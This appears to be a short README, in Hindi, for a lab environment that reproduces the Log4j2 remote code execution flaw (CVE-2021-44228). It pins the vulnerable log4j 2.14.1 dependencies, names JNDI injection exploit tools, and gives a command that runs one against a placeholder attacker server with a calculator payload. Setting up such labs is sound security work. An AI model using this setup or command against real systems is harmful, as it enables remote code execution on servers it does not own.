
Apache Log4j2 RCE( CVE-2021-44228)सत्यापन वातावरण
2021.12.09 से
https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg
Maven में संबंधित पैकेज और कमजोर संस्करण श्रेणी शामिल करें
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>


JDK संस्करण पर निर्भर करता है। JDK 11.0.1, 8u191, 7u201, 6u211 के बाद trustURLCodebase को true पर मैन्युअल रूप से सेट करना आवश्यक है।
इसके बारे में विस्तृत जानकारी के लिए देखें https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/
उपयोग विधि: JNDI इंजेक्शन टूल के साथ संयोजन कर सकते हैं, उदाहरण के लिए JNDI-Injection-Exploit, fastjson_rce_tool, JNDIExploit
उपकरणों के साथ संयोजन करके कई सार्वजनिक रूप से ज्ञात रीवाइंड विधियाँ और मेमोरी-माउंट इंजेक्शन विधियाँ भी प्राप्त की जा सकती हैं।
#
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app" -A your_vps_ip

TODO
